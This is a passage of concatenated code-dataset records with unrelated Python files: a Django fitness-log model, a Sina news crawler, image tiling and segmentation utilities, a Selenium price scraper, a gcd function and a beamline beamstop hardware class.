apple watch, fitbit etc.\n\n choices = [\n (\"L\", \"Low\"),\n (\"M\", \"Moderate\"),\n (\"H\", \"High\"),\n ]\n\n activity_lvl = models.CharField(\n max_length=1,\n choices=choices,\n blank=True,\n null=True,\n help_text=\"Estimate your relative activity level\",\n )\n\n front_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n side_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n back_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n\n def __str__(self):\n return f\"Log from {self.user}\"\n","sub_path":"mysite/nuk1i/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"651372241","text":"from bs4 import BeautifulSoup\nimport requests\nfrom save_date_by_text_file import save_link_list, load_link_list\nfrom custom_tools import logs\nimport re\nimport sys\n\nstart_url = 'http://news.sina.com.cn'\nnews_example_url = 'http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml'\nurl_list = []\nnews_url_list = []\nurl_set = set()\ntemp_set = set()\n\n\ndef get_soup(url):\n sessions = requests.session()\n sessions.headers[\n 'User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'\n html = sessions.get(url)\n html.encoding = 'utf-8'\n html = html.text\n return BeautifulSoup(html, 'html.parser')\n\n\ndef get_article_by_id_sina(url):\n soup = get_soup(url)\n return soup.find(id=\"article\", class_=\"article\").text\n\n\ndef get_url(url=start_url):\n try:\n soup = get_soup(url)\n for link in soup.find_all('a'):\n try:\n new_link = link['href']\n if new_link != 'javascript:void(0)':\n # print(link['href'])\n temp_set.add(new_link)\n except KeyError:\n pass\n except requests.exceptions.InvalidSchema:\n logs(\"maybe server connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n\n\ndef get_url2(url=start_url):\n try:\n soup = get_soup(url)\n for link in soup.find_all(name='a',\n attrs={\n \"href\": re.compile(\n r'.*sina\\\\.com\\\\.cn/.{1,4}/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\\\.shtml')}):\n # print(link['href'])\n temp_set.add(link['href'])\n except requests.exceptions.InvalidSchema:\n logs(\"maybe server connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n\n\ndef get_all_links(url=start_url, save_file_name=\"all_links.dat\"):\n get_url2(url)\n temp_source_set = temp_set.copy()\n for link in temp_source_set:\n get_url2(link)\n logs('link \\\"{}\\\" has been used'.format(link), 0)\n save_link_list(temp_set, save_file_name)\n\n\ndef get_sina_news(url='http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml'):\n news_link_set = set()\n html = requests.get(url)\n html.encoding = 'utf-8'\n html = html.text\n soup = BeautifulSoup(html, 'html.parser')\n # string=r'.*sina\\\\.com\\\\.cn/./[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\\\.shtml'\n for link in soup.find_all(name='a',\n attrs={\"href\": re.compile(r'.*sina\\\\.com\\\\.cn/.{1,4}/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\\\.shtml')}):\n # print(link['href'])\n news_link_set.add(link['href'])\n return news_link_set\n\n\ndef get_news_content(url='http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml'):\n news_content = ['title', 'date', 'content']\n soup = get_soup(url)\n news_content[0] = soup.find(name='h1', class_='main-title').text\n news_content[1] =
soup.find(name='span', class_='date').text\n news_content[2] = soup.find(id=\"article\", class_=\"article\").text\n return news_content\n\n\na_news_list = set()\nvisited_urls = set()\ncount = 0\n\n\ndef get_all_url(url):\n global count\n if url in visited_urls:\n # Skip links that were already crawled; otherwise the recursion never ends.\n return\n visited_urls.add(url)\n count += 1\n print(count)\n try:\n soup = get_soup(url)\n\n for link in soup.find_all(name='a',\n attrs={\n \"href\": re.compile(\n r'.*sina\\\\.com\\\\.cn/.{1,4}/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\\\.shtml')}):\n a_news_list.add(link['href'])\n\n except requests.exceptions.InvalidSchema:\n logs(\"maybe server connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n for link in list(a_news_list):\n # Iterate over a snapshot: the recursive calls add new links to the set.\n get_all_url(link)\n\n # save_link_list(a_news_list, \"all.txt\")\n\n\nif __name__ == '__main__':\n # get_all_links('http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml', 'selected_news_url.dat')\n # get_sina_news('http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml')\n # print(get_news_content())\n get_all_url('http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml')\n","sub_path":"Python/NewsViewer/get_news.py","file_name":"get_news.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632490159","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage.transform import resize,rescale\nfrom skimage.util import random_noise,pad\n#from skimage.external.tifffile import imread,imsave\nfrom skimage.io import imread,imsave\nfrom skimage.filters import gaussian, laplace, threshold_otsu, median\nfrom skimage.feature import shape_index\nfrom skimage.feature import hessian_matrix, hessian_matrix_eigvals\n\n\n\ndef normalize2max(im):\n im = im-np.min(im)\n return im/np.max(im)\n\ndef getPatch(im,sz):\n sr,sc = im.shape\n rr = np.random.randint(sr-sz)\n cc = np.random.randint(sc-sz)\n return im[rr:rr+sz,cc:cc+sz],rr,cc\n\nfrom skimage.util import view_as_windows,pad\ndef get_padding(im,size = 256,stride = 256):\n sr,sc = im.shape[0],im.shape[1]\n pad_r = stride-((sr-size)%stride)\n pad_c = stride-((sc-size)%stride)\n \n if (sr-size)%stride ==0:\n pad_r=0\n if (sc-size)%stride ==0:\n pad_c=0\n return int(pad_r),int(pad_c)\n\ndef extract_tiles(im,size=256,padding=16): \n \n stride = size - 2*padding \n if len(im.shape)<3:\n im = im[:,:,np.newaxis]\n sr,sc,ch = im.shape \n \n pad_r,pad_c = get_padding(im,size,stride)\n \n im = pad(im,((0,pad_r),(0,pad_c),(0,0)),'reflect')\n patches = view_as_windows(im,(size,size,ch),stride) \n patches = patches[:,:,0,:]\n \n sh = list(patches.shape)\n sh[1] = sh[0]*sh[1]\n sh = np.delete(sh,0)\n patches = np.reshape(patches,tuple(sh))\n \n R = np.arange(im.shape[0])\n rv = view_as_windows(R,size,stride) \n rv = rv[:,0]\n \n C = np.arange(im.shape[1])\n cv = view_as_windows(C,size,stride) \n cv = cv[:,0]\n cc,rr = np.meshgrid(cv,rv)\n positions = np.concatenate((rr.ravel()[:,np.newaxis],cc.ravel()[:,np.newaxis]),axis = 1)\n \n params = {}\n params['padding'] = padding\n params['pad_r'] = pad_r\n params['pad_c'] = pad_c\n params['im_size'] = im.shape[:2]\n params['positions'] = positions\n \n return patches,params\n\ndef stitch_tiles(patches,params):\n padding = params['padding']\n pad_r = params['pad_r']\n pad_c = params['pad_c']\n im_size = params['im_size']\n positions = params['positions']\n size = patches.shape[1]\n \n result = np.zeros((im_size[0],im_size[1],patches.shape[-1]))\n \n for i,pos in enumerate(positions):\n rr,cc = pos[0],pos[1]\n
result[rr:rr+size,cc:cc+size,:] += pad(patches[i,padding:-padding,padding:-padding,:],((padding,padding),(padding,padding),(0,0)),'constant')\n if pad_r>0:\n result = result[:-pad_r,:]\n if pad_c>0:\n result = result[:,:-pad_c]\n return result\n\n\ndef jaccard_coef(y_true, y_pred):\n smooth = 0.001\n #y_pred = K.cast(K.greater(y_pred, .8), dtype='float32') # .5 is the threshold\n #y_true = K.cast(K.greater(y_true, .9), dtype='float32') # .5 is the threshold\n intersection = np.mean(y_true * y_pred)\n sum_ = np.mean(y_true + y_pred)\n\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\n\n return jac\n\ndef get_rand_patch(im,sz):\n sr,sc = im.shape\n rr = np.random.randint(sr-sz)\n cc = np.random.randint(sc-sz)\n return im[rr:rr+sz,cc:cc+sz]\n\ndef find_best_parameter(im,mbnet,scale=1,invert = True):\n sr,sc = im.shape\n N = 5\n if scale != 1:\n im = rescale(im,scale)\n \n variances = np.arange(0.0,0.01,0.0005)\n imgs = []\n for v in variances: \n if v ==0:\n r1 = im*1.0\n else:\n r1 = random_noise(im,mode = 'gaussian',var = v,seed = 42)\n r1 = normalize2max(r1)\n if invert:\n r1 = 1.0-r1\n random_patches = np.array([mbnet.shapenet_preprocess(get_rand_patch(r1,256)) for ii in range(N)]) \n y1 = mbnet.model.predict(random_patches) \n imgs.append(y1)\n \n imgs = np.array(imgs)\n\n ym = np.mean(1.0*(imgs>0.98),axis = 0)\n J = np.array([jaccard_coef(i,ym) for i in imgs])\n idx = np.where(J == np.max(J))[0][0] \n return variances[idx],[variances,J]\n \ndef predict_small_images(im):\n # Note: relies on a module-level `shnet` model object being defined elsewhere.\n sr,sc = im.shape\n sz = 256\n r = int(np.ceil(sz/sr))\n im = np.tile(im,(r,r))\n if im.shape[0]>sz:\n y = shnet.segment(im) \n return y[:sr,:sc,:]\n else:\n x = shnet.shapenet_preprocess(im)\n y = shnet.unet.model.predict(x[np.newaxis,:]) \n return y[0,:sr,:sc,:]\n \n\n# def unsharp_mask(im):\n# return im - 0.8*gaussian(laplace(im),2)\n\ndef unsharp_mask(im,c=0.6,sigma=1):\n return (c/(2*c-1))*im - (1-c)/(2*c - 1)*gaussian(im,sigma)\n\ndef noise_profile(im,var1 = 0.005): \n im = normalize2max(im)\n gr,gc = np.gradient(im)\n e = gaussian(np.sqrt(gr**2 + gc**2),0.5)\n #e = np.abs(laplace(gaussian(im,2)))\n e = normalize2max(e)\n return random_noise(im,mode = 'localvar',local_vars = 0.00001+var1*(1-e),seed = 42)\n ","sub_path":"MiSiCgui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515096251","text":"from selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport time\r\nfirefox_options = Options()\r\nlist_prices = []\r\n\r\n\r\n\r\nprint(\"1\")\r\ndef browser_data():\r\n firefox_options.add_argument('--headless')\r\n firefox_options.add_argument('--disable-gpu')\r\n firefox_options.add_argument('window-size=1920x1080')\r\n print(\"2\")\r\n browser = webdriver.Firefox(executable_path='C:/Users/Johan/Webdrivers/geckodriver')#, options=firefox_options)\r\n print(\"3\")\r\n start_URL = \"https://www.plus500.se/\"\r\n print(\"4\")\r\n browser.get(start_URL)\r\n print(\"5\")\r\n print(browser.title)\r\n search_click = browser.find_element_by_xpath('/html/body/header/section/div/div/div/div[2]/div/div[2]/button')\r\n search_click.click()\r\n search_bar = browser.find_element_by_xpath('//*[@id=\"searchInstruments\"]')\r\n time.sleep(1)\r\n search_bar.send_keys(\"AMD\")\r\n time.sleep(2)\r\n search_bar.send_keys(Keys.RETURN)\r\n
time.sleep(1)\r\n number_of_times = 0\r\n\r\n while True:\r\n now = datetime.now()\r\n price = browser.find_element_by_xpath('/html/body/div[1]/div[1]/section/div/div[1]/div[1]/p[1]/span[1]')\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n time_and_price = (current_time, price.text)\r\n print(time_and_price)\r\n number_of_times += 1\r\n browser.refresh()\r\n list_prices.append(time_and_price)  # append keeps each (time, price) pair together\r\n if number_of_times == 3:\r\n break\r\n time.sleep(2)\r\n\r\n print(list_prices)\r\n\r\n\r\nbrowser_data()\r\n","sub_path":"aasd.py","file_name":"aasd.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"142231138","text":"# gcd finds the greatest common factor of two numbers.\n# it says that gcd(m, n) assuming m > n \n# if n divides m return n \n# otherwise compute gcd(n, m-n) and return that value\n\n\ndef gcd(m, n):\n # reconstructed from the comments above; m % n is what repeated\n # subtraction of n from m leaves, and the modulo form also terminates\n # when the arguments arrive out of order\n if m % n == 0:\n return n\n return gcd(n, m % n)\n\n\"\"\"\nEMBLBeamstop\n\"\"\"\n\nfrom HardwareRepository.BaseHardwareObjects import Device\n\n\n__author__ = \"Ivars Karpics\"\n__credits__ = [\"MXCuBE collaboration\"]\n\n__version__ = \"2.2.\"\n__maintainer__ = \"Ivars Karpics\"\n__email__ = \"ivars.karpics[at]embl-hamburg.de\"\n__status__ = \"Draft\"\n\n\nclass EMBLBeamstop(Device):\n \"\"\"\n Descrip. :\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Descrip. :\n \"\"\"\n Device.__init__(self, name)\n\n self.beamstop_distance = None\n self.default_beamstop_size = None\n self.default_beamstop_distance = None\n self.default_beamstop_direction = None \n\n self.chan_beamstop_distance = None\n\n def init(self):\n \"\"\"\n Descrip. :\n \"\"\"\n self.default_beamstop_size = \\\n self.getProperty(\"defaultBeamstopSize\")\n self.default_beamstop_distance = \\\n self.getProperty(\"defaultBeamstopDistance\")\n self.default_beamstop_direction = \\\n self.getProperty(\"defaultBeamstopDirection\")\n \n self.chan_beamstop_distance = \\\n self.getChannelObject('BeamstopDistance')\n if self.chan_beamstop_distance is not None:\n self.chan_beamstop_distance.connectSignal(\"update\", \n self.beamstop_distance_changed)\n\n def isReady(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return True\n\n def beamstop_distance_changed(self, value):\n self.beamstop_distance = value\n self.emit('beamstopDistanceChanged', (value))\n\n def set_positions(self, position):\n if self.chan_beamstop_distance is not None:\n self.chan_beamstop_distance.setValue(position)\n self.beamstop_distance_changed(position) \n\n def moveToPosition(self, name):\n pass\n \n def get_beamstop_size(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return self.default_beamstop_size\n\n def get_beamstop_distance(self):\n \"\"\"\n Descrip. :\n \"\"\"\n beamstop_distance = None\n if self.chan_beamstop_distance is not None:\n beamstop_distance = self.chan_beamstop_distance.getValue()\n\n if beamstop_distance is None:\n return self.default_beamstop_distance\n else:\n return beamstop_distance\n\n def get_beamstop_direction(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return self.default_beamstop_direction\n\n def update_values(self):\n self.beamstop_distance = self.chan_beamstop_distance.getValue()\n self.emit('beamstopDistanceChanged', (self.beamstop_distance))\n \n","sub_path":"EMBL/EMBLBeamstop.py","file_name":"EMBLBeamstop.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
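A few usage sketches for the samples above. First, the `$variable` decoration technique from evaluation.py: `_decorate_variables` only performs membership tests on the variable store, so a plain dict can stand in for Robot Framework's real store. The `decorate` helper below is a hypothetical, simplified version (it leaves unknown names untouched instead of raising, and `untokenize` may space the output slightly differently):

import token
from io import StringIO
from tokenize import generate_tokens, untokenize

def decorate(expression, variable_store):
    # Same token-stream rewrite as _decorate_variables above: '$' tokenizes
    # as an ERRORTOKEN, and a NAME token right after it becomes RF_VAR_<name>.
    variable_started = variable_found = False
    tokens = []
    for toknum, tokval, _, _, _ in generate_tokens(StringIO(expression).readline):
        if variable_started:
            if toknum == token.NAME and tokval in variable_store:
                tokval = 'RF_VAR_' + tokval
                variable_found = True
            else:
                # Not a known variable: put the consumed '$' back.
                tokens.append((token.ERRORTOKEN, '$'))
            variable_started = False
        if toknum == token.ERRORTOKEN and tokval == '$':
            variable_started = True
        else:
            tokens.append((toknum, tokval))
    return untokenize(tokens).strip() if variable_found else expression

print(decorate('$x + 1', {'x': 42}))  # RF_VAR_x + 1 (modulo whitespace)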
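The `_import_modules` helper in the same file has one non-obvious step: after importing 'root.sub' it must also bind 'root', because `eval()` resolves only the top-level name and reaches the submodule via attribute access. A hypothetical standalone version using only the standard library:

def import_modules(module_names):
    modules = {}
    for name in module_names.replace(' ', '').split(','):
        if not name:
            continue
        # Note: __import__('os.path') actually returns the top-level 'os'
        # module; the dotted key just mirrors what was asked for.
        modules[name] = __import__(name)
        while '.' in name:
            name, _ = name.rsplit('.', 1)
            modules[name] = __import__(name)
    return modules

ns = import_modules('os.path, json')
print(sorted(ns))                          # ['json', 'os', 'os.path']
print(eval('os.path.join("a", "b")', ns))  # a/b on POSIX, a\b on Windows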
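For the tiling helpers in utils.py, a round-trip sketch, assuming extract_tiles and stitch_tiles (with their imports) are in scope; note they use skimage.util.pad, which recent scikit-image releases dropped in favour of numpy.pad. Only each tile's centre (the part inside the padding margin) is written back on stitching, so the reconstruction matches the input everywhere except a padding-wide outer border:

import numpy as np

im = np.random.rand(300, 400)
patches, params = extract_tiles(im, size=256, padding=16)
print(patches.shape)   # (4, 256, 256, 1) for this image size

recon = stitch_tiles(patches, params)[:, :, 0]
print(recon.shape)     # (300, 400)

p = 16  # the same padding used above
assert np.allclose(im[p:-p, p:-p], recon[p:-p, p:-p])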
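Finally, a worked trace of the Euclidean gcd reconstructed above, assuming that gcd() helper is in scope. Since m % n is what repeated subtraction of n from m leaves, the modulo form is the subtraction form described in the sample's comments, fast-forwarded; it also self-corrects when the smaller argument comes first:

#   gcd(48, 18) -> 48 % 18 = 12 -> gcd(18, 12)
#   gcd(18, 12) -> 18 % 12 = 6  -> gcd(12, 6)
#   gcd(12, 6)  -> 12 % 6  = 0  -> 6
assert gcd(48, 18) == 6
assert gcd(18, 48) == 6  # first step reorders: gcd(48, 18 % 48) == gcd(48, 18)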